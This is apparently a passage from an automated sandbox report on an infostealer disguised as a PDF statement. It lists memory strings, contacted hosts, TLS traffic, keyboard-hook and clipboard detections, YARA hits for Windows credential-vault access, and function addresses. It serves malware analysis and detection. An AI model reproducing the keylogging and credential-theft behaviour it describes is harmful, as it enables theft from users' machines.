0000001E.00000002.4081952252.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002ADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.fascia-arch.com
                      Source: Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006729000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006707000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4123465356.0000000006762000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4124030684.0000000006777000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4123465356.000000000676E000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000302F000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151301532.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.000000000673F000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4150449840.0000000007DAB000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4121813503.00000000068ED000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0
                      Source: Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006729000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006707000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4123465356.0000000006762000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4124030684.0000000006777000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4123465356.000000000676E000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000302F000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.000000000673F000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4150449840.0000000007DAB000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4121813503.00000000068ED000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4074399117.000000000148A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1699276440.00000000029BD000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000A.00000002.1763034515.00000000025BD000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003031000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000012.00000002.1853285183.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000012.00000002.1853285183.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1928490064.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.1940766232.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.1940766232.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.000000000290C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707110996.0000000005BF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlqX
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006729000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151590709.0000000007DE4000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.0000000001040000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.000000000106A000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4124030684.0000000006777000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4120771933.00000000066C6000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151301532.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.000000000673F000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4150449840.0000000007DAB000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4121813503.00000000068ED000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4074399117.000000000148A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006729000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151590709.0000000007DE4000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.0000000001040000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.000000000106A000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4124030684.0000000006777000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4120771933.00000000066C6000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151301532.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.000000000673F000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4150449840.0000000007DAB000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4121813503.00000000068ED000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4074399117.000000000148A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000012.00000002.1856813364.0000000004928000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1916411729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.1945703172.0000000004798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003031000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000012.00000002.1856813364.0000000004928000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1916411729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1928490064.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.1945703172.0000000004798000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.000000000290C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003031000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1928490064.00000000034F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003031000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1928490064.00000000034F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49755 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, 8WWn.cs.Net Code: UOFvW
                      Source: 0.2.Statement of Account PDF.bat.exe.43f8cd0.3.raw.unpack, 8WWn.cs.Net Code: UOFvW
                      Installs a global keyboard hook
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Statement of Account PDF.bat.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 25.2.BjTxJte.exe.4798530.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 18.2.BjTxJte.exe.4963d80.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 22.2.BjTxJte.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Statement of Account PDF.bat.exe.43f8cd0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 18.2.BjTxJte.exe.4928d60.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 25.2.BjTxJte.exe.47d3550.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 25.2.BjTxJte.exe.47d3550.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 18.2.BjTxJte.exe.4928d60.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 25.2.BjTxJte.exe.4798530.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 18.2.BjTxJte.exe.4963d80.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Statement of Account PDF.bat.exe.43f8cd0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_076A39100_2_076A3910
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_076A2C680_2_076A2C68
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_076A34D80_2_076A34D8
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_00F125D80_2_00F125D8
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_04EE18080_2_04EE1808
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_04EE17F80_2_04EE17F8
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CCC5500_2_06CCC550
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CCE6F00_2_06CCE6F0
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CEA6880_2_06CEA688
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CE9CC80_2_06CE9CC8
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CE6CD80_2_06CE6CD8
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CE39C00_2_06CE39C0
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CE72800_2_06CE7280
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CE72710_2_06CE7271
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CEA3E00_2_06CEA3E0
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CEA3F00_2_06CEA3F0
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CEC3880_2_06CEC388
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CEC3780_2_06CEC378
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CE9CB80_2_06CE9CB8
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_074A9BC00_2_074A9BC0
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_074A7A200_2_074A7A20
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_074AC9000_2_074AC900
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_074AAA600_2_074AAA60
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_074ABED00_2_074ABED0
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_074AF1480_2_074AF148
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_074A00400_2_074A0040
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_074A00060_2_074A0006
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_074ABC880_2_074ABC88
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_074AD8A80_2_074AD8A8
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_010141F88_2_010141F8
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_0101EB088_2_0101EB08
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_01014AC88_2_01014AC8
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_0101ADF88_2_0101ADF8
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_01013EB08_2_01013EB0
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_069527508_2_06952750
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_069565C88_2_069565C8
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_0695B1F88_2_0695B1F8
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_0695C1388_2_0695C138
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_06957D488_2_06957D48
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_069555688_2_06955568
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_069576688_2_06957668
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_0695E3608_2_0695E360
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_06955CC08_2_06955CC0
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_069500408_2_06950040
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_023F1CC410_2_023F1CC4
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_023F01A010_2_023F01A0
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_023F2B1110_2_023F2B11
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_023F0B6010_2_023F0B60
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_023F0B5010_2_023F0B50
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_068FC55010_2_068FC550
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_068FE6F010_2_068FE6F0
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06A1A68810_2_06A1A688
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06A1236810_2_06A12368
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06A19CC810_2_06A19CC8
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06A16CD810_2_06A16CD8
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06A1728010_2_06A17280
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06A1727110_2_06A17271
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06A1C38010_2_06A1C380
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06A1C38810_2_06A1C388
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06A1A3E010_2_06A1A3E0
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06A1A3F010_2_06A1A3F0
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06A19CB810_2_06A19CB8
